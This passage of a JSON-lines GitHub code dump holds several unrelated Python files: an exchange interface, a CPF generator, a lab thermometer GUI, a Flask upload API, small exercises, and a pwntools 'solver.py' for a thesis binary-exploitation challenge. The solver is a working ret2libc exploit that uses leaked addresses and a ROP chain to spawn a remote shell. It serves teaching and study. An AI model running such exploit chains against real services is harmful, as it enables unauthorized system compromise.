list_of_trading_pairs: List[TradingPair]) -> List[TradeData]:\n raise NotImplementedError\n\n @abc.abstractmethod\n def get_savings_interests(self, from_timestamp: int, to_timestamp: int, list_of_assets: List[str]) -> List[InterestData]:\n raise NotImplementedError\n\n @abc.abstractmethod\n def get_withdrawals(self, from_timestamp: int, to_timestamp: int, list_of_assets: List[str]) -> List[WithdrawalData]:\n raise NotImplementedError\n\n @abc.abstractmethod\n def get_deposits(self, from_timestamp: int, to_timestamp: int, list_of_assets: List[str]) -> List[DepositData]:\n raise NotImplementedError\n\n\nclass AbstractCryptoExchangeClientModule(metaclass=abc.ABCMeta):\n @classmethod\n def __subclasshook__(cls, subclass):\n return (callable(subclass.get_exchange_client) and\n hasattr(subclass, 'get_exchange_client') and\n callable(subclass.get_exchange_name) and\n hasattr(subclass, 'get_exchange_name') and\n callable(subclass.is_enabled) and\n hasattr(subclass, 'is_enabled') or\n NotImplemented)\n\n @abc.abstractmethod\n def get_exchange_client(self) -> AbstractCryptoExchangeClient:\n raise NotImplementedError\n # return here the instance of your client implementation\n\n @abc.abstractmethod\n def get_exchange_name(self) -> str:\n raise NotImplementedError\n # return here the exchange name which will be used for logging and user-interaction purposes\n\n @abc.abstractmethod\n def is_enabled(self) -> bool:\n raise NotImplementedError\n # return here if the plugin is enabled and all needed configuration is set\n","repo_name":"financelurker/crypto-trades-firefly-iii","sub_path":"src/backends/exchanges/exchange_interface.py","file_name":"exchange_interface.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"} +{"seq_id":"19094183805","text":"from random import randint\n\n\ndef cpfdig(l_num):\n # l_num = l_num\n\n cpf_test1 = []\n\n for mult, _num in enumerate(l_num[::-1], 2):\n x = mult * int(_num)\n cpf_test1 += [x]\n dig = 11 - (sum(cpf_test1) % 11)\n if dig > 9:\n dig = 0\n\n return str(dig)\n\n\ndef sepcpf(cpf):\n if '-' in cpf:\n num, dig = cpf.split('-')\n else:\n dig, num = cpf[-2:], cpf[:-2]\n num = num.replace('.', '')\n return num, dig\n\n\ndef verifycpf(cpf):\n if cpf.count(cpf[0]) == 11:\n return False\n num, dig = sepcpf(cpf)\n d1 = cpfdig(num)\n d2 = cpfdig(num+d1)\n if d1+d2 == dig:\n rs = (num+dig).replace('', ' ').strip().split(' ')\n rs = sum(map(int, rs))\n return True if rs % 11 == 0 else False\n else:\n return False\n\n\ndef cpfformat(cpf):\n cpflista = cpf.replace('', ' ').strip().split(' ')\n cpflista.insert(9, '-')\n for ind in range(3, 9, 4):\n cpflista.insert(ind, '.')\n\n return ''.join(cpflista)\n\n\nif __name__ == '__main__':\n f = False\n while not f:\n cpf = str(randint(100000000, 999999999))\n dig = cpfdig(cpf)\n f = verifycpf(cpf)\n print(f, cpf)\n","repo_name":"EdAndradeF/geredor_cpf","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6890485008","text":"import PySimpleGUI as sg\r\nimport os.path\r\n\r\n#For graphing:\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nimport numpy as np\r\nimport matplotlib\r\nmatplotlib.use('TkAgg')\r\n\r\nimport time\r\n\r\n\r\n#VISA communication:\r\nimport pyvisa\r\n\r\n\r\n#Instrument interaction related functions:\r\ndef full_query(my_instrument, arg):\r\n my_instrument.write(arg)\r\n try:\r\n s=str(my_instrument.read())\r\n my_instrument.clear()\r\n return s\r\n except UnicodeDecodeError:\r\n window[\"-BUFFER-\"].print('----UnicodeDecodeError----')\r\n\r\ndef full_print(my_instrument):\r\n while True:\r\n try:\r\n s=str(my_instrument.read()).strip()\r\n ss=''\r\n if '*' in s:\r\n my_instrument.clear()\r\n break\r\n else:\r\n window[\"-BUFFER-\"].print(' '+s)\r\n except UnicodeDecodeError:\r\n window[\"-BUFFER-\"].print('----UnicodeDecodeError----')\r\n\r\n\r\n#Functions needed for graphing:\r\ndef fig_maker(t,tenp):\r\n plt.ylim(20, 40)\r\n plt.grid()\r\n plt.scatter(t, tenp, c='blue')\r\n return plt.gcf()\r\n\r\ndef draw_figure(canvas, figure, loc=(0, 0)):\r\n figure_canvas_agg = FigureCanvasTkAgg(figure, canvas)\r\n figure_canvas_agg.draw()\r\n figure_canvas_agg.get_tk_widget().pack(side='top', fill='both', expand=1)\r\n return figure_canvas_agg\r\n\r\ndef delete_fig_agg(fig_agg):\r\n fig_agg.get_tk_widget().forget()\r\n plt.close('all')\r\n\r\n \r\n#---------------------------------------------------------------------------------------------------------\r\n\r\n\r\n# Define the elements for the GUI\r\n\r\nfirst_column = [\r\n [ sg.Text('VISA resource name',s=(20,1)), sg.Text('Time unit (s)',s=(20,1))],\r\n [ sg.Combo(['', 'Temperature', 'Arduino'],\\\r\n s=(20,1), enable_events=True, readonly=True, key='-DEVICE-'),\r\n sg.Input(s=20, key='-TUNIT-', enable_events=True, default_text= '0.5')\r\n ],\r\n [\r\n sg.Text(\"File to save data\")],\r\n [ sg.In(s=(30, 1), enable_events=True, key=\"-FILE-\"),\r\n sg.FileBrowse(s=(10, 1)),\r\n ],\r\n [ sg.Text('Buffer')],\r\n [ sg.Multiline(s=(45, 20), enable_events=True, \\\r\n no_scrollbar = True, autoscroll=True, key=\"-BUFFER-\", \\\r\n default_text= 'No data yet', do_not_clear=True)\r\n ],\r\n]\r\n\r\nsecond_column = [\r\n [ sg.Text('Time (s)',s=(17,1)),\r\n sg.Text('Temperature (ºC)',s=(20,1))\r\n ],\r\n [ sg.Multiline(s=(20, 1), enable_events=True, \\\r\n no_scrollbar = True, key=\"-TIME-\", \\\r\n default_text= ' '),\r\n sg.Multiline(s=(20, 1), enable_events=True, \\\r\n no_scrollbar = True, key=\"-TEMPERATURE-\", \\\r\n default_text= ' ')\r\n ],\r\n [ sg.VPush()],\r\n [ sg.Text('T vs t plot')],\r\n [ sg.Canvas(s=(300, 260), key='-CANVAS-',background_color='white')],\r\n [ sg.Text('', s=(10,1))],\r\n [\r\n sg.Button('Start', s=(11,2), enable_events=True, key=\"-START-\"),\r\n sg.Button('Stop', s=(11,2), enable_events=True, key=\"-STOP-\"),\r\n sg.Button('Exit', s=(11,2), enable_events=True, key=\"-EXIT-\")\r\n ],\r\n [\r\n sg.Button('System Information', s=(37,1), enable_events=True, key=\"-INFO-\")\r\n ]\r\n]\r\n\r\n# Set the right click menu\r\nMENU_RIGHT_CLICK_EDITME_VER_EXIT = ['', ['Version', 'Exit']]\r\n'''\r\nAdd this to your window call:\r\nright_click_menu=sg.MENU_RIGHT_CLICK_EDITME_VER_EXIT\r\n'''\r\n\r\n\r\n# Set the full layout and the window\r\nlayout = [\r\n [\r\n sg.Column(first_column, s=(350,500)),\r\n sg.VSeperator(),\r\n sg.Column(second_column, s=(350,500)),\r\n ]\r\n]\r\n\r\nwindow = sg.Window(\"Temperature reading\", layout, finalize=True, \\\r\n right_click_menu=sg.MENU_RIGHT_CLICK_EDITME_VER_EXIT)\r\n\r\n\r\n\r\n# Run the Event Loop --------------------------------------------------------------------------------------\r\n\r\nbreak_out_flag = False #This will help us to exit all the while loops, from the innermost to the outside.\r\nfile_flag=False #This speficies wheteher a file name has been given or not.\r\nt_unit=0.5 #The default time between measurements will be 0.5s.\r\n\r\nfig_agg0 = None \r\n\r\nwhile True:\r\n event, values = window.read()\r\n\r\n #Exit the program:\r\n if event == \"Exit\" or event == sg.WIN_CLOSED or break_out_flag or event == '-EXIT-':\r\n break\r\n\r\n #Choose and configure the device. It only works for the thermometer.\r\n elif event == '-DEVICE-':\r\n rm = pyvisa.ResourceManager()\r\n if values['-DEVICE-'] == 'Temperature':\r\n try:\r\n #Set connection with the device\r\n my_instrument = rm.open_resource('ASRL1::INSTR')\r\n my_instrument.baud_rate = 9600\r\n my_instrument.data_bits=8\r\n my_instrument.parity=0 #None\r\n my_instrument.stop_bits=10 #one = \r\n my_instrument.flow_control=0 #none\r\n\r\n my_instrument.read_termination = '\\n'\r\n my_instrument.write_termination = '\\r'\r\n\r\n window[\"-BUFFER-\"].update(f\"Current instrument:\\n{my_instrument}\\n\\n\")\r\n except:\r\n window[\"-BUFFER-\"].print('Connection with the thermometer can not be done. \\\r\n Try again.', end=2*'\\n')\r\n continue\r\n finally:\r\n #Print data\r\n window[\"-BUFFER-\"].print(f\"{'Enclosure temperature:':<25}{full_query(my_instrument, 'b')[2:]}ºC\", end=2*'\\n')\r\n \r\n elif values['-DEVICE-'] == 'Arduino':\r\n window[\"-BUFFER-\"].update(\"This program does not support the selected device.\")\r\n else:\r\n window[\"-BUFFER-\"].update('No device selected.')\r\n\r\n #Choose and open the file where the data will be written.\r\n elif event == \"-FILE-\":\r\n file_name = values[\"-FILE-\"]\r\n if file_name.lower().endswith((\".txt\", \".dat\")):\r\n window[\"-BUFFER-\"].update(f'Data will be written in: {file_name}')\r\n file_flag=True\r\n try:\r\n file=open(file_name, 'w', encoding='utf-8')\r\n except:\r\n window[\"-BUFFER-\"].update(\"Error while opening the file.\\n\")\r\n else:\r\n window[\"-BUFFER-\"].update('The file type is not correct. Try .txt or .dat.')\r\n #raise TypeError('The file type is not correct. Try .txt or .dat')\r\n\r\n #Set a different timing between measurements.\r\n elif event == '-TUNIT-':\r\n try:\r\n t_unit=float(values['-TUNIT-'])\r\n window[\"-BUFFER-\"].update(f'Time unit: {t_unit}s.')\r\n except:\r\n window[\"-BUFFER-\"].update('Time unit value error.')\r\n t_unit=0.5\r\n\r\n #This configures one of the options of the right-click menu.\r\n elif event == 'Version':\r\n sg.popup_scrolled(sg.get_versions())\r\n\r\n #Pressing the STOP button will pause the program but will not close it.\r\n elif event == '-STOP-':\r\n window[\"-BUFFER-\"].update('')\r\n window[\"-TIME-\"].update('')\r\n window[\"-TEMPERATURE-\"].update('')\r\n delete_fig_agg(fig_agg0)\r\n\r\n #Pressing the INFO button will print the system information that the computer can get.\r\n elif event == '-INFO-':\r\n if values['-DEVICE-'] == 'Temperature':\r\n window[\"-BUFFER-\"].update(\"System information:\")\r\n my_instrument.write('i')\r\n full_print(my_instrument)\r\n else:\r\n window[\"-BUFFER-\"].update('Select an appropriate device.')\r\n \r\n #Pressing START will begin the measurements. An additional while loop will be needed.\r\n elif event == '-START-':\r\n if values['-DEVICE-'] != 'Temperature': #This program only supports the thermometer.\r\n window[\"-BUFFER-\"].update('Select an appropriate device.')\r\n continue\r\n window[\"-BUFFER-\"].update(f\"{' t(s)':>10} {'T(ºC)':^10}\\n\")\r\n t_0=time.time()\r\n t_1=0\r\n t_list=[]\r\n tenp_list=[]\r\n while True:\r\n event, values = window.read(timeout=1) #Unit: ms\r\n if event == \"Exit\" or event == sg.WIN_CLOSED:\r\n break_out_flag=True #When this is checked in the general loop, the cycle will be exited without needing to press EXIT again.\r\n break\r\n elif event == \"-STOP-\": #Pressing STOP does not delete the data written on the file, it only adds an empty line between sets of measurements.\r\n if file_flag:\r\n file.write(\"\\n\")\r\n break\r\n else:\r\n t=time.time()-t_0\r\n if t-t_1 >= t_unit:\r\n t_1=t\r\n tenp=float(full_query(my_instrument, 't'))\r\n window[\"-BUFFER-\"].print(f\"{t:>10.3f} {tenp:<10}\", end='\\n')\r\n window[\"-TIME-\"].update(round(t,3))\r\n window[\"-TEMPERATURE-\"].update(tenp)\r\n\r\n t_list.append(t)\r\n tenp_list.append(tenp)\r\n fig = fig_maker(t_list,tenp_list)\r\n \r\n fig.set_size_inches(3, 2.6, forward=True)\r\n fig_agg = draw_figure(window['-CANVAS-'].TKCanvas, fig)\r\n if fig_agg0 is not None:\r\n delete_fig_agg(fig_agg0)\r\n window.Refresh()\r\n fig_agg0=fig_agg\r\n \r\n if file_flag:\r\n file.write(f\"{t:>10.3f} {tenp:<10}\\n\")\r\n \r\n \r\nif file_flag: #closes the file only if a file has been opened before.\r\n file.close()\r\n \r\nwindow.close()\r\nmy_instrument.close()\r\n","repo_name":"BeBerasategi/Pythonen-bidezko-LabVIEW-ren-ordezkoa","sub_path":"Python_VISA_neurketa.py","file_name":"Python_VISA_neurketa.py","file_ext":"py","file_size_in_byte":9788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"907317010","text":"import os\nimport glob\nimport numpy as np\nfrom PIL import Image\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\n\n\ndef load_data(cover_images_path, secret_images_path, image_shape=(64, 64)):\n cover_train_paths = glob.glob(cover_images_path+'*')\n secret_train_paths = glob.glob(secret_images_path+'*')\n\n cover_images = []\n secret_images = []\n\n for cover, sc in zip(sorted(cover_train_paths), sorted(secret_train_paths)):\n cov = Image.open(cover).convert('RGB').resize(image_shape)\n secret = Image.open(sc).convert('RGB').resize(image_shape)\n cover_images.append(cov)\n secret_images.append(secret)\n\n return cover_images, secret_images\n\n\ndef normalize_images(images):\n return np.array([np.array(img) / 255.0 for img in images])\n\ndef split_data(cover_images, secret_images):\n cover_images = normalize_images(cover_images)\n secret_images = normalize_images(secret_images)\n\n X_cover_train, X_cover_val, X_secret_train, X_secret_val = train_test_split(cover_images, secret_images, test_size=0.2, random_state=42)\n\n return X_cover_train, X_cover_val, X_secret_train, X_secret_val\n\ndef create_dataset(X_cover, X_secret, batch_size, buffer_size):\n dataset = tf.data.Dataset.from_tensor_slices(((X_cover, X_secret), (X_cover, X_secret)))\n dataset = dataset.shuffle(buffer_size).batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n\n return dataset\n","repo_name":"Dini-49149/Image_steganography_DL","sub_path":"src/data_preparation.py","file_name":"data_preparation.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"579621211","text":"import random\nimport colorama\nfrom colorama import Fore,Style\n\nopt = ['rock', 'paper', 'scissors']\n\nprint('How many times you want to play?')\ntimes = int(input())\n\nn = [] # to count the player wins\nm = [] # to count the computer wins\n\nfor _ in range(times):\n i = random.randint(0,2)\n comp = opt[i]\n \n print('Enter your choice: (rock,paper,scissors)')\n user = input().lower()\n \n if user == comp:\n print(Fore.BLUE + \" That's a tie\")\n n.append(0)\n m.append(0)\n elif user == 'rock':\n if comp =='scissors':\n print(Fore.GREEN + ' Congrats ', user,' smashed ', comp)\n n.append(1)\n else:\n print(Fore.RED + ' Sorry ', comp, ' covered ', user)\n m.append(1)\n elif user == 'paper':\n if comp == 'rock':\n print(Fore.GREEN + ' Congrats ', user,' covered ', comp)\n n.append(1)\n else:\n print(Fore.RED + ' Sorry ', comp, ' cuts ', user)\n m.append(1)\n elif user == 'scissors':\n if comp == 'paper':\n print(Fore.GREEN + ' Congrats ', user, ' cuts ', comp)\n n.append(1)\n else:\n print(Fore.RED + ' Sorry ', comp, ' covered ', user)\n m.append(1)\n else:\n print(\" You've not entered a valid choice!, please enter either rock, paper or scissors\")\n\n\nuser_wins = sum(n) \ncomp_wins = sum(m)\nprint(Fore.GREEN + 'You have won ', user_wins, 'times')\nprint(Fore.RED + 'Computer has won', comp_wins , 'times')\nif comp_wins == user_wins:\n print(Fore.BLUE + \"That's a tie\")\nelif comp_wins > user_wins:\n print(Fore.RED + 'Sorry computer has won this time')\nelse:\n print(Fore.GREEN + 'Congrats, you have won the game !!!')\n\nprint(Style.RESET_ALL)\n","repo_name":"adarshrajnandu/Rock-Paper-Scissors","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19609560963","text":"n, m = map(int, input().split())\nlength = list(map(int, input().split()))\n\nlim = max(length)\n\ndef binarySearch(array, start, end) :\n result = 0\n while start <= end :\n total = 0\n mid = (start+end)//2\n for i in array :\n if mid < i :\n total += i-mid\n if total >= m :\n result = mid\n start = mid+1\n else :\n end = mid-1\n return result\n\nprint(binarySearch(length, 0, lim))\n ","repo_name":"seongjukang/Algorithm_Solution","sub_path":"이코테_by_Python/BinarySearch_2.py","file_name":"BinarySearch_2.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34538444953","text":"from flask import Flask, request, jsonify\nfrom docx import Document\nimport magic\n\nfrom dotenv import load_dotenv, find_dotenv\nimport os\n_ = load_dotenv(find_dotenv()) # read local .env file\nTOKEN = os.environ['TOKEN']\n\napp = Flask(__name__)\n\n@app.route('/hello', methods=['GET'])\ndef hello():\n return jsonify({\"message\": \"Hello, World!\"})\n\n@app.route('/upload', methods=['POST'])\ndef upload_file():\n # Extract token from the Authorization header\n auth_header = request.headers.get('Authorization')\n\n if not auth_header:\n return jsonify(error=\"Missing Authorization header\"), 401\n\n # Extract the token from the Bearer format\n token = auth_header.split(\" \")[1] if \" \" in auth_header else auth_header\n\n # Check the token\n if token != TOKEN:\n return jsonify(error=\"Invalid token\"), 403\n\n # Check if a file was sent\n if 'file' not in request.files:\n return jsonify({'error': 'No file part'}), 400\n file = request.files['file']\n\n # If no filename provided, return error\n if file.filename == '':\n return jsonify({'error': 'No selected file'}), 400\n\n # If file exists, process it\n if file:\n # Read the Word Document\n doc = Document(file)\n fullText = []\n for para in doc.paragraphs:\n fullText.append(para.text)\n return magic.simplify('\\n'.join(fullText))\n\n return jsonify({'error': 'File processing failed'}), 500\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8081)\n","repo_name":"calippo/traduttorelegalese-backend","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22487516516","text":"#!/usr/bin/python3.8\nimport warnings\nfrom pwn import *\nfrom termcolor import colored\nwarnings.filterwarnings(\"ignore\")\ncontext.arch = \"amd64\"\n\nfname = \"./challenge5\" \n\ne = ELF(fname)\nrop = ROP(e)\nlibc = ELF(e.runpath + b\"./libc.so.6\") \n\nLOCAL = False\n\nprompt = \">\"\n\ndef ret2libc(r, prompt, offset):\n\n #gdb.attach(r)\n r.recvuntil(\"address: [\")\n stack_addr = int(r.recvuntil(']')[:-1], 16)\n log.info(f\"Stack address @ {hex(stack_addr)}\")\n r.recvuntil(\"GOT: [\")\n libc.address = int(r.recvuntil(']')[:-1], 16) - libc.sym.printf\n log.info(f\"Libc base @ {hex(libc.address)}\")\n one_byte = stack_addr & 0xff\n log.info(f\"One byte: {hex(one_byte)}\")\n one_byte = p64(one_byte-8)[:1]\n \n # Craft payload to call system(\"/bin/sh\") and spawn shell\n pop_rdi = rop.find_gadget([\"pop rdi\"])[0]\n payload = p64(pop_rdi+1)\n payload += p64(pop_rdi)\n payload += p64(next(libc.search(b\"/bin/sh\")))\n payload += p64(pop_rdi+1)\n payload += p64(libc.sym.system)\n payload += b'\\x90'*(offset - len(payload))\n payload += one_byte\n log.info(f\"Len payload: {len(payload)}\")\n r.sendafter(prompt, payload)\n r.interactive()\n\n\ndef pwn():\n # Find the overflow offset\n offset = 64\n \n # Open a local process or a remote instance\n if LOCAL:\n r = process(fname)\n else:\n r = remote(\"0.0.0.0\", 1337)\n\n ret2libc(r, prompt, offset)\n\nif __name__ == \"__main__\":\n pwn()\n","repo_name":"w3th4nds/Thesis-2023","sub_path":"challenge5/challenge/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18628770826","text":"import os\n\nos.system('clear')\n\n\n\nclass Vehiculo():\n #inicializamos los atributos\n def __init__(self, color, noruedas, nopuertas):\n\n self.color= color\n self.noruedas= noruedas\n self.nopuertas= nopuertas\n \n def __str__(self):\n return \"Color del auto: {}, No. de ruedas: {}, No. de puertas {}\".format(self.color, self.noruedas, self.nopuertas)\n \n\nclass Coche(Vehiculo):\n \n def __init__(self, color, noruedas, nopuertas, velocidad, cilindrada):\n self.color = color\n self.noruedas = noruedas\n self.nopuertas = nopuertas\n self.velocidad = velocidad\n self.cilindrada = cilindrada\n \n def __str__(self):\n return \"Color del auto :{}\\nNo. de ruedas :{}\\nNo. de puertas :{}\\nVelocidad :{}km/h\\nCilindrada :{}cc\".format(self.color, self.noruedas, self.nopuertas, self.velocidad, self.cilindrada)\n \n\n\nprimerauto = Coche(\"azul\", 4, 4, 160, 2000)\n\nprint(primerauto)\n\n\n \n ","repo_name":"rodasalfaro/open-bootcamp","sub_path":"python/clase6ejercicio1python.py","file_name":"clase6ejercicio1python.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71118449153","text":"from itertools import chain\n\nfrom psycopg2.extensions import adapt\nfrom django.contrib.postgres.search import SearchQuery\n\n\nclass PrefixedSearchQuery(SearchQuery):\n def as_sql(self, compiler, connection):\n terms = chain.from_iterable(\n expr.value.split() for expr in self.source_expressions\n )\n\n value = adapt(\"%s:*\" % \" & \".join(terms)).getquoted().decode(\"iso-8859-1\")\n\n if self.config:\n config_sql, config_params = compiler.compile(self.config)\n template = \"to_tsquery({}::regconfig, {})\\\n\t\t\t\t.format(config_sql, value)\"\n params = config_params\n else:\n template = \"to_tsquery({})\".format(value)\n params = []\n\n if self.invert:\n template = \"!!({})\".format(template)\n\n return template, params\n","repo_name":"LawyerMorty97/python-django-skeleton","sub_path":"src/utils/full_text_search.py","file_name":"full_text_search.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17401170426","text":"# Maybe it's a cipher? Maybe, but we don’t know for sure.\n\n# Maybe you can call it \"homomorphism\"? i wish I know this word before.\n\n# You need to check that the 2 given strings are isometric. This means that a character from one string can become a match for characters from another string.\n\n# One character from one string can correspond only to one character from another string. Two or more characters of one string can correspond to one character of another string, but not vice versa.\n\n# Input: Two arguments. Both strings.\n\n# Output: Boolean.\n\n# Precondition:\n# both strings are the same size\n\ndef isometric_strings(str1: str, str2: str) -> bool:\n \n #allocate local variables:\n inval = []\n outval = False #Guilty until proven innocent\n \n list1 = []\n list2 = []\n \n comp1 = \"\"\n comp2 = \"\"\n \n #Grab all non-duplicate letters from the first input\n for i in str1:\n if i not in inval and i != \" \": #Ignore spaces, as that might cause problems.\n inval.append(i)\n \n for i in range(0, len(inval)):#Assign each letter a unique number for comparison\n list1.append([inval[i], i])\n \n inval = [] #Reset inval real quick\n \n #Grab all non-duplicate letters from the second input\n for i in str2:\n if i not in inval and i != \" \":#Alternatively we could strip out all the spaces, but that'd be more tedious.\n inval.append(i)\n \n for i in range(0, len(inval)):#Assign each letter a unique number for comparison\n list2.append([inval[i], i])\n \n #A couple of debug calls\n #print(list1)\n #print(list2)\n \n #Replace each letter in the input string with it's corresponding number\n for i in list1:\n for j in str1:\n if j == i[0]:\n comp1 = f\"{comp1}{i[1]}\"\n \n #Do the same thing for the second string\n for i in list2:\n for j in str2:\n if j == i[0]:\n comp2 = f\"{comp2}{i[1]}\"\n \n #print(comp1)\n #print(comp2)\n \n #Compare the two. if they're equal, return True\n if comp2 == comp1:\n outval = True\n \n return outval\n \n# if __name__ == '__main__':\n# print(\"Example:\")\n# print(isometric_strings('add', 'egg'))\n\n# # These \"asserts\" are used for self-checking and not for an auto-testing\n# assert isometric_strings('add', 'egg') == True\n# assert isometric_strings('foo', 'bar') == False\n# assert isometric_strings('', '') == True\n# assert isometric_strings('all', 'all') == True\n# print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n","repo_name":"Isaac-D-Dawson/Homework-Uploads","sub_path":"PyCheckIO/IsometricStrings.py","file_name":"IsometricStrings.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73162986753","text":"import pymongo\nimport consoleExecute as consoleExecute\n\n\ndef main_implementation(param):\n print(param)\n comand = \"echo 'get startup-config /tmp/{0}.backup' | tftp {0}\"\n for line in consoleExecute.run_command(comand.format(param)):\n lineDecoded = line.decode('utf-8').strip()\n print(lineDecoded)\n return \"/tmp/{0}.backup\".format(param)\n\n\nif __name__ == \"__main__\":\n main_implementation(\"10.0.27.1\")\n","repo_name":"Deosc/ProyectoRedes","sub_path":"pyhton/practicas/ws/getConfigImp.py","file_name":"getConfigImp.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31815035031","text":"import os\nimport Action\n\nclass Entity:\n yes_no_str_buttons = \"[כן|לא]\"\n\n def __init__(self, rootDir, entityFileName, spellingFileName, conversationFileName):\n self.entityFileName = entityFileName\n self.spellingFileName = spellingFileName\n self.spelling = []\n self.actions = []\n self.entityNameHeb = \"\"\n self.InitSpellingBank(rootDir)\n actionsNames = os.listdir(rootDir + '/' + entityFileName)\n for action in actionsNames:\n if(\".\" not in action):\n self.actions.append(Action.Action(rootDir, entityFileName, action, spellingFileName, conversationFileName, self.entityNameHeb))\n\n def InitSpellingBank(self, rootDir):\n file = open(rootDir + '/' + self.entityFileName + '/' + self.spellingFileName, encoding='utf-8')\n self.spelling = [line.rstrip('\\n') for line in file]\n if len(self.spelling) > 0:\n self.entityNameHeb = self.spelling[0]\n file.close()\n\n def AskUserForAction(self):\n answer_actions = self.strAllActions()\n actions = \"\"\n if answer_actions[0] == 1:\n bold_action = \"\" + answer_actions[1] + \"\"\n actions += \"אני רק מוודא, התכוונת ל\" + bold_action + \"?\\n\" + self.yes_no_str_buttons\n else:\n actions += \"אני רק מוודא, התכוונת ל\\n\"\n actions += '[' + self.strAllActions() + ']'\n\n return actions\n\n def strAllActions(self):\n actions = \"\"\n\n if len(self.actions) == 1:\n action = self.actions[0]\n return [1, action.actionNameHeb + ' ' + action.entityNameHeb]\n else:\n for action in self.actions:\n actions += action.actionNameHeb + ' ' + action.entityNameHeb + '|'\n actions = actions[:len(actions) - 1]\n\n return [len(self.actions), actions]","repo_name":"RnDteam/CCai","sub_path":"hebChatbot/Entity.py","file_name":"Entity.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31124232332","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\n\n__all__ = (\n \"RankingTab\",\n \"RankingTabs\",\n)\n\n\n@dataclass\nclass RankingTab:\n \"\"\"The ranking tab for KM.\"\"\"\n\n id: int\n \"\"\":class:`int`: The ID of the tab.\"\"\"\n name: str\n \"\"\":class:`str`: The name of the tab.\"\"\"\n tab: str\n \"\"\":class:`str`: The tab name when used as :class:`click.Choice`.\"\"\"\n\n\nRankingTabs = [\n RankingTab(3, \"Action\", \"action\"),\n RankingTab(4, \"Sports\", \"sports\"),\n RankingTab(5, \"Romance\", \"romance\"),\n RankingTab(6, \"Isekai\", \"isekai\"),\n RankingTab(7, \"Suspense\", \"romance\"),\n RankingTab(8, \"Outlaws\", \"outlaws\"),\n RankingTab(9, \"Drama\", \"drama\"),\n RankingTab(10, \"Fantasy\", \"fantasy\"),\n RankingTab(11, \"Slice of Life\", \"sol\"),\n RankingTab(12, \"All\", \"all\"),\n RankingTab(13, \"Today's Specials\", \"specials\"),\n]\n","repo_name":"noaione/tosho-mango","sub_path":"tosho_mango/sources/kmkc/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"418199750","text":"from airflow.providers.amazon.aws.hooks.s3 import S3Hook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nimport boto3 \nimport os\nimport logging\n\n\nclass DataLakeUpload(BaseOperator):\n '''\n Checking Datalake Transformations\n '''\n @apply_defaults\n def __init__(self,aws_credentials_id,s3_bucket,path,keys,*args,**kwargs):\n ''' \n Arguments: \n aws_credentials_id = Credentials of IAM-Role\n s3_bucket = Bucket Name \n path = Bucket Key/Subfolder\n keys = Futher Subfolder\n '''\n super(DataLakeUpload, self).__init__(*args,**kwargs)\n self.aws_credentials_id = aws_credentials_id\n self.s3_bucket = s3_bucket\n self.path = path\n self.keys = keys\n\n def execute(self,context):\n ''' \n Execute function\n '''\n aws_hook = S3Hook(aws_conn_id=self.aws_credentials_id)\n credentials = aws_hook.get_credentials()\n\n s3=boto3.client('s3',aws_access_key_id=credentials.access_key,aws_secret_access_key=credentials.secret_key)\n\n bucket_list=[]\n\n for key in self.keys:\n for upload in s3.list_objects(Bucket=self.s3_bucket,Delimiter='/', Prefix=self.path+key)['Contents']:\n bucket_list.append(upload['Key'])\n if len(bucket_list)>0:\n logging.info('{} Files processed and uploaded'.format(key))\n else:\n assert bucket_list, \"No Files found for {}\".format(key) \n ","repo_name":"AshrafIb/Data_Engineering_Capstone","sub_path":"plugins/operators/check_upload.py","file_name":"check_upload.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11215779049","text":"#Создаем два списка из проверенных и непроверенных юзеров\r\n\r\nunconfirmed_users = ['alex', 'max', 'john',]\r\nconfirmed_users = []\r\n\r\n#Перебераем каждого юзера с конца выводим имя по мере проверки\r\n#Добавляем проверенных юзеров в список проверенных\r\n\r\nwhile unconfirmed_users:\r\n current_user = unconfirmed_users.pop()\r\n print(\"Проверяемый юзер: \" + current_user.title())\r\n confirmed_users.append(current_user)\r\n\r\n#Выводим список проверенных 